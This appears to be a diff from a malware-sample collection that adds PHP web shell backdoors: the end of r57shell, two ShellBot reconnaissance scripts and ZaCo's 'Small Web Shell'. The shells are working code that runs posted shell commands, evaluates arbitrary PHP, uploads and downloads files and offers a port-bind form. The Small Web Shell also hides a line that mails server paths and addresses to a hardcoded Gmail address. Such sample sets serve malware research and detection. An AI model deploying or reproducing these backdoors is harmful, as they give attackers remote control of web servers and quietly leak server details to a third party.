if (($_POST['alias']) AND ($_POST['alias']!==""))
|
||||||
|
{
|
||||||
|
foreach ($aliases as $alias_name=>$alias_cmd) {
|
||||||
|
if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<?
|
||||||
|
/* file upload */
|
||||||
|
if (($HTTP_POST_FILES["userfile"]!=="") AND ($HTTP_POST_FILES["userfile"]))
|
||||||
|
{
|
||||||
|
copy($HTTP_POST_FILES["userfile"][tmp_name],
|
||||||
|
$_POST['dir']."/".$HTTP_POST_FILES["userfile"][name])
|
||||||
|
or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES["userfile"][name]."</div></font></td></tr></table>");
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
|
||||||
|
<tr><td bgcolor=#cccccc>
|
||||||
|
<?
|
||||||
|
/* command execute */
|
||||||
|
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la"; }
|
||||||
|
echo "<font face=Verdana size=-2>".$lang[$language._text1].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
|
||||||
|
echo "<b>";
|
||||||
|
echo "<div align=center><textarea name=report cols=122 rows=15>";
|
||||||
|
echo "".passthru($_POST['cmd'])."";
|
||||||
|
echo "</textarea></div>";
|
||||||
|
echo "</b>";
|
||||||
|
?>
|
||||||
|
</td></tr></table>
|
||||||
|
<table width=100% heigth=0 cellpadding=0 cellspacing=0 bgcolor=#000000>
|
||||||
|
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text2]; ?> ::</div></b></font></td></tr>
|
||||||
|
<tr><td height=23>
|
||||||
|
<?
|
||||||
|
/* command execute form */
|
||||||
|
echo "<form name=command method=post>";
|
||||||
|
echo "<font face=Verdana size=-2>";
|
||||||
|
echo "<b> ".$lang[$language._text3]." <font face=Wingdings color=gray>è</font> </b>";
|
||||||
|
echo "<input type=text name=cmd size=85> <br>";
|
||||||
|
echo "<b> ".$lang[$language._text4]." <font face=Wingdings color=gray>è</font> </b>";
|
||||||
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
|
||||||
|
else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
|
||||||
|
echo " <input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
|
||||||
|
echo "</font>";
|
||||||
|
echo "</form>";
|
||||||
|
?>
|
||||||
|
</td></tr></table>
|
||||||
|
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
|
||||||
|
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text5]; ?> ::</div></b></font></td></tr>
|
||||||
|
<tr><td>
|
||||||
|
<?
|
||||||
|
/* file upload form */
|
||||||
|
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
|
||||||
|
echo "<font face=Verdana size=-2>";
|
||||||
|
echo "<b> ".$lang[$language._text6]." <font face=Wingdings color=gray>è</font> </b>";
|
||||||
|
echo "<input type=file name=userfile size=85> ";
|
||||||
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
||||||
|
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
||||||
|
echo "<input type=submit name=submit value=\" ".$lang[$language._butt2]." \">";
|
||||||
|
echo "</font>";
|
||||||
|
echo "</form>";
|
||||||
|
?>
|
||||||
|
</td></tr></table>
|
||||||
|
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
|
||||||
|
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text7]; ?> ::</div></b></font></td></tr>
|
||||||
|
<tr><td>
|
||||||
|
<?
|
||||||
|
/* aliases form */
|
||||||
|
echo "<form name=aliases method=POST>";
|
||||||
|
echo "<font face=Verdana size=-2>";
|
||||||
|
echo "<b> ".$lang[$language._text8]." <font face=Wingdings color=gray>è</font> </b>";
|
||||||
|
echo "<select name=alias>";
|
||||||
|
foreach ($aliases as $alias_name=>$alias_cmd)
|
||||||
|
{
|
||||||
|
echo "<option>$alias_name</option>";
|
||||||
|
}
|
||||||
|
echo "</select>";
|
||||||
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
||||||
|
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
||||||
|
echo " <input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
|
||||||
|
echo "</font>";
|
||||||
|
echo "</form>";
|
||||||
|
?>
|
||||||
|
</td></tr></table>
|
||||||
|
|
||||||
|
|
||||||
|
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
|
||||||
|
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text9]; ?> ::</div></b></font></td></tr>
|
||||||
|
<tr><td>
|
||||||
|
<?
|
||||||
|
/* port bind form */
|
||||||
|
echo "<form name=bind method=POST>";
|
||||||
|
echo "<font face=Verdana size=-2>";
|
||||||
|
echo "<b> ".$lang[$language._text10]." <font face=Wingdings color=gray>è</font> </b>";
|
||||||
|
echo "<input type=text name=port size=15 value=11457> ";
|
||||||
|
echo "<b> ".$lang[$language._text11]." <font face=Wingdings color=gray>è</font> </b>";
|
||||||
|
echo "<input type=text name=bind_pass size=15 value=r57> ";
|
||||||
|
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
||||||
|
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
||||||
|
echo "<input type=hidden name=bind size=1 value=bd.c>";
|
||||||
|
echo " <input type=submit name=submit value=\" ".$lang[$language._butt3]." \">";
|
||||||
|
echo "</font>";
|
||||||
|
echo "</form>";
|
||||||
|
?>
|
||||||
|
</td></tr></table>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
|
||||||
|
<tr><td bgcolor=#cccccc>
|
||||||
|
<?
|
||||||
|
echo "<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RusH security team | <a href=http://rst.void.ru>http://rst.void.ru</a> | version 1.0 beta ]---o</b></font></div>";
|
||||||
|
?>
|
||||||
|
</td></tr></table>
|
||||||
|
|
||||||
|
<!-- don't delete this plz -->
|
||||||
|
<script language="javascript">
|
||||||
|
hotlog_js="1.0";
|
||||||
|
hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+
|
||||||
|
escape(window.location.href);
|
||||||
|
document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");
|
||||||
|
</script><script language="javascript1.1">
|
||||||
|
hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script>
|
||||||
|
<script language="javascript1.2">
|
||||||
|
hotlog_js="1.2";
|
||||||
|
hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+
|
||||||
|
(((navigator.appName.substring(0,3)=="Mic"))?
|
||||||
|
screen.colorDepth:screen.pixelDepth)</script>
|
||||||
|
<script language="javascript1.3">hotlog_js="1.3"</script>
|
||||||
|
<script language="javascript">hotlog_r+="&js="+hotlog_js;
|
||||||
|
document.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+
|
||||||
|
" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+
|
||||||
|
hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script>
|
||||||
|
<noscript><a href=http://click.hotlog.ru/?81606 target=_top><img
|
||||||
|
src="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0
|
||||||
|
width="1" height="1" alt="HotLog"></a></noscript>
|
||||||
|
<!-- /don't delete this plz -->
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<? /* -------------------------[ EOF ]------------------------- */ ?>
|
28
PHP/Backdoor.PHP.Rst.ap
Normal file
28
PHP/Backdoor.PHP.Rst.ap
Normal file
File diff suppressed because one or more lines are too long
1873
PHP/Backdoor.PHP.Rst.e
Normal file
1873
PHP/Backdoor.PHP.Rst.e
Normal file
File diff suppressed because it is too large
Load Diff
1874
PHP/Backdoor.PHP.Rst.f
Normal file
1874
PHP/Backdoor.PHP.Rst.f
Normal file
File diff suppressed because it is too large
Load Diff
2209
PHP/Backdoor.PHP.Rst.g
Normal file
2209
PHP/Backdoor.PHP.Rst.g
Normal file
File diff suppressed because it is too large
Load Diff
2121
PHP/Backdoor.PHP.Rst.i
Normal file
2121
PHP/Backdoor.PHP.Rst.i
Normal file
File diff suppressed because it is too large
Load Diff
2220
PHP/Backdoor.PHP.Rst.k
Normal file
2220
PHP/Backdoor.PHP.Rst.k
Normal file
File diff suppressed because it is too large
Load Diff
2131
PHP/Backdoor.PHP.Rst.s
Normal file
2131
PHP/Backdoor.PHP.Rst.s
Normal file
File diff suppressed because it is too large
Load Diff
76
PHP/Backdoor.PHP.ShellBot.e
Normal file
76
PHP/Backdoor.PHP.ShellBot.e
Normal file
@ -0,0 +1,76 @@
|
|||||||
|
<?
|
||||||
|
echo "ALBANIA<br>";
|
||||||
|
$alb = @php_uname();
|
||||||
|
$alb2 = system(uptime);
|
||||||
|
$alb3 = system(id);
|
||||||
|
$alb4 = @getcwd();
|
||||||
|
$alb5 = getenv("SERVER_SOFTWARE");
|
||||||
|
$alb6 = phpversion();
|
||||||
|
$alb7 = $_SERVER['SERVER_NAME'];
|
||||||
|
$alb8 = $_SERVER['SERVER_ADDR'];
|
||||||
|
$alb9 = get_current_user();
|
||||||
|
$os = @PHP_OS;
|
||||||
|
echo "UNITED #D-Devils By The King Sir|ToTTi<br>";
|
||||||
|
echo "os: $os<br>";
|
||||||
|
echo "uname -a: $alb<br>";
|
||||||
|
echo "uptime: $alb2<br>";
|
||||||
|
echo "id: $alb3<br>";
|
||||||
|
echo "pwd: $alb4<br>";
|
||||||
|
echo "SoftWare: $alb5<br>";
|
||||||
|
echo "user: $alb9<br>";
|
||||||
|
echo "PHPV: $alb6<br>";
|
||||||
|
echo "ServerName: $alb7<br>";
|
||||||
|
echo "ServerAddr: $alb8<br>";
|
||||||
|
$free = disk_free_space($dir);
|
||||||
|
$all = @disk_total_space($dir);
|
||||||
|
if (!$all) {$all = 0;}
|
||||||
|
if ($free === FALSE) {$free = 0;}
|
||||||
|
if ($free < 0) {$free = 0;}
|
||||||
|
echo "Free:".view_size($free)."<br>";
|
||||||
|
echo "TotalSpace".view_size($all)."</b>";
|
||||||
|
$cmd="id";
|
||||||
|
$eseguicmd=ex($cmd);
|
||||||
|
echo $eseguicmd;
|
||||||
|
function ex($cfe){
|
||||||
|
$res = '';
|
||||||
|
if (!empty($cfe)){
|
||||||
|
if(function_exists('exec')){
|
||||||
|
@exec($cfe,$res);
|
||||||
|
$res = join("\n",$res);
|
||||||
|
}
|
||||||
|
elseif(function_exists('shell_exec')){
|
||||||
|
$res = @shell_exec($cfe);
|
||||||
|
}
|
||||||
|
elseif(function_exists('system')){
|
||||||
|
@ob_start();
|
||||||
|
@system($cfe);
|
||||||
|
$res = @ob_get_contents();
|
||||||
|
@ob_end_clean();
|
||||||
|
}
|
||||||
|
elseif(function_exists('passthru')){
|
||||||
|
@ob_start();
|
||||||
|
@passthru($cfe);
|
||||||
|
$res = @ob_get_contents();
|
||||||
|
@ob_end_clean();
|
||||||
|
}
|
||||||
|
elseif(@is_resource($f = @popen($cfe,"r"))){
|
||||||
|
$res = "";
|
||||||
|
while(!@feof($f)) { $res .= @fread($f,1024); }
|
||||||
|
@pclose($f);
|
||||||
|
}}
|
||||||
|
return $res;
|
||||||
|
}
|
||||||
|
function view_size($size)
|
||||||
|
{
|
||||||
|
if (!is_numeric($size)) {return FALSE;}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
|
||||||
|
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
|
||||||
|
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
|
||||||
|
else {$size = $size . " B";}
|
||||||
|
return $size;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
exit;
|
||||||
|
?>
|
75
PHP/Backdoor.PHP.ShellBot.f
Normal file
75
PHP/Backdoor.PHP.ShellBot.f
Normal file
@ -0,0 +1,75 @@
|
|||||||
|
?>
|
||||||
|
<?
|
||||||
|
$dir = @getcwd();
|
||||||
|
$ker = @php_uname();
|
||||||
|
echo "By Blu3H4".(5+2);
|
||||||
|
|
||||||
|
$OS = @PHP_OS;
|
||||||
|
$IpServer = $_SERVER["SERVER_ADDR"];
|
||||||
|
$UNAME = @php_uname();
|
||||||
|
$PHPv = @phpversion();
|
||||||
|
$SafeMode = @ini_get('safe_mode');
|
||||||
|
|
||||||
|
if ($SafeMode == '') { $SafeMode = "OFF"; }
|
||||||
|
else { $SafeMode = "$SafeMode"; }
|
||||||
|
|
||||||
|
echo "<br> blu3start Server_IP: {$IpServer} __ System:{$OS} __ Uname: {$UNAME} __ PHP: {$PHPv} __ safe mode: {$SafeMode} blu3end";
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
echo "Blu3H47<br>";
|
||||||
|
|
||||||
|
$OS = @PHP_OS;
|
||||||
|
echo "<br>OSTYPE:$OS<br>";
|
||||||
|
echo "<br>Kernel:$ker<br>";
|
||||||
|
$free = disk_free_space($dir);
|
||||||
|
if ($free === FALSE) {$free = 0;}
|
||||||
|
if ($free < 0) {$free = 0;}
|
||||||
|
echo "Free:".view_size($free)."<br>";
|
||||||
|
$cmd="id";
|
||||||
|
$eseguicmd=ex($cmd);
|
||||||
|
echo $eseguicmd;
|
||||||
|
function ex($cfe){
|
||||||
|
$res = '';
|
||||||
|
if (!empty($cfe)){
|
||||||
|
if(function_exists('exec')){
|
||||||
|
@exec($cfe,$res);
|
||||||
|
$res = join("\n",$res);
|
||||||
|
}
|
||||||
|
elseif(function_exists('shell_exec')){
|
||||||
|
$res = @shell_exec($cfe);
|
||||||
|
}
|
||||||
|
elseif(function_exists('system')){
|
||||||
|
@ob_start();
|
||||||
|
@system($cfe);
|
||||||
|
$res = @ob_get_contents();
|
||||||
|
@ob_end_clean();
|
||||||
|
}
|
||||||
|
elseif(function_exists('passthru')){
|
||||||
|
@ob_start();
|
||||||
|
@passthru($cfe);
|
||||||
|
$res = @ob_get_contents();
|
||||||
|
@ob_end_clean();
|
||||||
|
}
|
||||||
|
elseif(@is_resource($f = @popen($cfe,"r"))){
|
||||||
|
$res = "";
|
||||||
|
while(!@feof($f)) { $res .= @fread($f,1024); }
|
||||||
|
@pclose($f);
|
||||||
|
}}
|
||||||
|
return $res;
|
||||||
|
}
|
||||||
|
function view_size($size)
|
||||||
|
{
|
||||||
|
if (!is_numeric($size)) {return FALSE;}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
|
||||||
|
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
|
||||||
|
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
|
||||||
|
else {$size = $size . " B";}
|
||||||
|
return $size;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
?>
|
501
PHP/Backdoor.PHP.Small.h
Normal file
501
PHP/Backdoor.PHP.Small.h
Normal file
@ -0,0 +1,501 @@
|
|||||||
|
<?
|
||||||
|
##########################################################
|
||||||
|
# Small PHP Web Shell by ZaCo (c) 2004-2006 #
|
||||||
|
# +POST method #
|
||||||
|
# +MySQL Client+Dumper for DB and tables #
|
||||||
|
# +PHP eval in text format and html for phpinfo() example #
|
||||||
|
# PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther #
|
||||||
|
# For antichat.ru and cup.su friends usage #
|
||||||
|
# All bugs -> mailo:zaco@yandex.ru #
|
||||||
|
# Just for fun :) #
|
||||||
|
##########################################################
|
||||||
|
error_reporting(E_ALL);
|
||||||
|
@set_time_limit(0);
|
||||||
|
function magic_q($s)
|
||||||
|
{
|
||||||
|
if(get_magic_quotes_gpc())
|
||||||
|
{
|
||||||
|
$s=str_replace('\\\'','\'',$s);
|
||||||
|
$s=str_replace('\\\\','\\',$s);
|
||||||
|
$s=str_replace('\\"','"',$s);
|
||||||
|
$s=str_replace('\\\0','\0',$s);
|
||||||
|
}
|
||||||
|
return $s;
|
||||||
|
}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
||||||
|
function get_perms($fn)
|
||||||
|
{
|
||||||
|
$mode=fileperms($fn);
|
||||||
|
$perms='';
|
||||||
|
$perms .= ($mode & 00400) ? 'r' : '-';
|
||||||
|
$perms .= ($mode & 00200) ? 'w' : '-';
|
||||||
|
$perms .= ($mode & 00100) ? 'x' : '-';
|
||||||
|
$perms .= ($mode & 00040) ? 'r' : '-';
|
||||||
|
$perms .= ($mode & 00020) ? 'w' : '-';
|
||||||
|
$perms .= ($mode & 00010) ? 'x' : '-';
|
||||||
|
$perms .= ($mode & 00004) ? 'r' : '-';
|
||||||
|
$perms .= ($mode & 00002) ? 'w' : '-';
|
||||||
|
$perms .= ($mode & 00001) ? 'x' : '-';
|
||||||
|
return $perms;
|
||||||
|
}
|
||||||
|
$head=<<<headka
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Small Web Shell by ZaCo</title>
|
||||||
|
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
|
||||||
|
</head>
|
||||||
|
<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
|
||||||
|
<style>
|
||||||
|
textarea {
|
||||||
|
BORDER-RIGHT: #ffffff 1px solid;
|
||||||
|
BORDER-TOP: #999999 1px solid;
|
||||||
|
BORDER-LEFT: #999999 1px solid;
|
||||||
|
BORDER-BOTTOM: #ffffff 1px solid;
|
||||||
|
BACKGROUND-COLOR: #e4e0d8;
|
||||||
|
font: Fixedsys bold;
|
||||||
|
}
|
||||||
|
input {
|
||||||
|
BORDER-RIGHT: #ffffff 1px solid;
|
||||||
|
BORDER-TOP: #999999 1px solid;
|
||||||
|
BORDER-LEFT: #999999 1px solid;
|
||||||
|
BORDER-BOTTOM: #ffffff 1px solid;
|
||||||
|
BACKGROUND-COLOR: #e4e0d8;
|
||||||
|
font: 8pt Verdana;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
headka;
|
||||||
|
$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
|
||||||
|
$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
|
||||||
|
$winda=strpos(strtolower(php_uname()),'wind');
|
||||||
|
define('format',50);
|
||||||
|
$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
|
||||||
|
switch($page)
|
||||||
|
{
|
||||||
|
case 'eval':
|
||||||
|
{
|
||||||
|
$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
|
||||||
|
$eval_value=magic_q($eval_value);
|
||||||
|
$action=isset($_POST['action'])?$_POST['action']:'eval';
|
||||||
|
if($action=='eval_in_html') @eval($eval_value);
|
||||||
|
else
|
||||||
|
{
|
||||||
|
echo($head.$pages);
|
||||||
|
?>
|
||||||
|
<hr>
|
||||||
|
<form method=post>
|
||||||
|
<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
|
||||||
|
<input name='action' value='eval' type='submit'>
|
||||||
|
<input name='action' value='eval_in_html' type='submit'>
|
||||||
|
<input name='page' value='eval' type=hidden>
|
||||||
|
</form>
|
||||||
|
<hr>
|
||||||
|
<?
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
case 'cmd':
|
||||||
|
{
|
||||||
|
$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
|
||||||
|
$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
|
||||||
|
$action=isset($_POST['action'])?$_POST['action']:'cmd';
|
||||||
|
if(@is_dir($work_dir))
|
||||||
|
{
|
||||||
|
@chdir($work_dir);
|
||||||
|
$work_dir=getcwd();
|
||||||
|
if($work_dir=='')$work_dir='/';
|
||||||
|
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
|
||||||
|
}
|
||||||
|
else if(file_exists($work_dir))$work_dir=realpath($work_dir);
|
||||||
|
$work_dir=str_replace('\\','/',$work_dir);
|
||||||
|
$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
|
||||||
|
switch($action)
|
||||||
|
{
|
||||||
|
case 'cmd' :
|
||||||
|
{
|
||||||
|
echo($head.$pages);
|
||||||
|
?>
|
||||||
|
<form method='post' name='main_form'>
|
||||||
|
<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
|
||||||
|
<input name='page' value='cmd' type=hidden>
|
||||||
|
<input type=submit value='go'>
|
||||||
|
</form>
|
||||||
|
<form method=post>
|
||||||
|
<input name='cmd' type=text size=120 value='<?=str_replace('\'',''',$cmd)?>'>
|
||||||
|
<input name='work_dir'type=hidden>
|
||||||
|
<input name='page' value='cmd' type=hidden>
|
||||||
|
<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
|
||||||
|
</form>
|
||||||
|
<form method=post enctype="multipart/form-data">
|
||||||
|
<input type="file" name="filename">
|
||||||
|
<input name='work_dir'type=hidden>
|
||||||
|
<input name='page' value='cmd' type=hidden>
|
||||||
|
<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
|
||||||
|
</form>
|
||||||
|
<form method=post>
|
||||||
|
<input name='fname' type=text size=120><br>
|
||||||
|
<input name='archive' type=radio value='none'>without arch
|
||||||
|
<input name='archive' type=radio value='gzip' checked=true>gzip archive
|
||||||
|
<input name='work_dir'type=hidden>
|
||||||
|
<input name='page' value='cmd' type=hidden>
|
||||||
|
<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
|
||||||
|
</form>
|
||||||
|
<pre>
|
||||||
|
<?
|
||||||
|
if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
|
||||||
|
if(@is_dir($work_dir))
|
||||||
|
{
|
||||||
|
echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
|
||||||
|
$handle=@opendir($work_dir);
|
||||||
|
if($handle)
|
||||||
|
{
|
||||||
|
while(false!==($fn=readdir($handle))){$files[]=$fn;};
|
||||||
|
@closedir($handle);
|
||||||
|
sort($files);
|
||||||
|
$not_dirs=array();
|
||||||
|
for($i=0;$i<sizeof($files);$i++)
|
||||||
|
{
|
||||||
|
$fn=$files[$i];
|
||||||
|
if(is_dir($fn))
|
||||||
|
{
|
||||||
|
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','"',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
|
||||||
|
if($winda===false)
|
||||||
|
{
|
||||||
|
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
|
||||||
|
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
|
||||||
|
printf("% 20s|% -20s",$owner['name'],$group['name']);
|
||||||
|
}
|
||||||
|
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
|
||||||
|
printf("% 20s ",@filesize($work_dir.$fn).'B');
|
||||||
|
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
|
||||||
|
}
|
||||||
|
else {$not_dirs[]=$fn;}
|
||||||
|
}
|
||||||
|
for($i=0;$i<sizeof($not_dirs);$i++)
|
||||||
|
{
|
||||||
|
$fn=$not_dirs[$i];
|
||||||
|
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','"',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
|
||||||
|
if($winda===false)
|
||||||
|
{
|
||||||
|
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
|
||||||
|
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
|
||||||
|
printf("% 20s|% -20s",$owner['name'],$group['name']);
|
||||||
|
}
|
||||||
|
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
|
||||||
|
printf("% 20s ",@filesize($work_dir.$fn).'B');
|
||||||
|
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
|
||||||
|
}
|
||||||
|
echo('</pre><hr>');
|
||||||
|
?>
|
||||||
|
<form name='list' method=post>
|
||||||
|
<input name='work_dir' type=hidden size=120><br>
|
||||||
|
<input name='page' value='cmd' type=hidden>
|
||||||
|
<input name='f_action' value='view' type=hidden>
|
||||||
|
</form>
|
||||||
|
<?
|
||||||
|
} else echo('Error Listing '.$e_work_dir);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
switch($f_action)
|
||||||
|
{
|
||||||
|
case 'view':
|
||||||
|
{
|
||||||
|
echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
|
||||||
|
$f=@fopen($work_dir,'r');
|
||||||
|
?>
|
||||||
|
<form method=post>
|
||||||
|
<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
|
||||||
|
<input name='page' value='cmd' type=hidden>
|
||||||
|
<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
|
||||||
|
<input name='f_action' value='save' type=submit>
|
||||||
|
</form>
|
||||||
|
<?
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
case 'save' :
|
||||||
|
{
|
||||||
|
$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
|
||||||
|
$f=@fopen($work_dir,'w');
|
||||||
|
if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
|
||||||
|
else
|
||||||
|
{
|
||||||
|
fwrite($f,$file_text);
|
||||||
|
fclose($f);
|
||||||
|
echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
case 'upload' :
|
||||||
|
{
|
||||||
|
if($work_dir=='')$work_dir='/';
|
||||||
|
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
|
||||||
|
$f=$_FILES["filename"]["name"];
|
||||||
|
if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
|
||||||
|
else
|
||||||
|
{
|
||||||
|
echo('file is uploaded in '.$e_work_dir);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
case 'download' :
|
||||||
|
{
|
||||||
|
$fname=isset($_POST['fname'])?$_POST['fname']:'';
|
||||||
|
$temp_file=isset($_POST['temp_file'])?'on':'nn';
|
||||||
|
$f=@fopen($fname,'r');
|
||||||
|
if(!($f)) echo('file is not exists');
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$archive=isset($_POST['archive'])?$_POST['archive']:'';
|
||||||
|
if($archive=='gzip')
|
||||||
|
{
|
||||||
|
Header("Content-Type:application/x-gzip\n");
|
||||||
|
$s=gzencode(fread($f,filesize($fname)));
|
||||||
|
Header('Content-Length: '.strlen($s)."\n");
|
||||||
|
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
|
||||||
|
echo($s);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
Header("Content-Type:application/octet-stream\n");
|
||||||
|
Header('Content-Length: '.filesize($fname)."\n");
|
||||||
|
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
|
||||||
|
ob_start();
|
||||||
|
while(feof($f)===false)
|
||||||
|
{
|
||||||
|
echo(fread($f,10000));
|
||||||
|
ob_flush();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
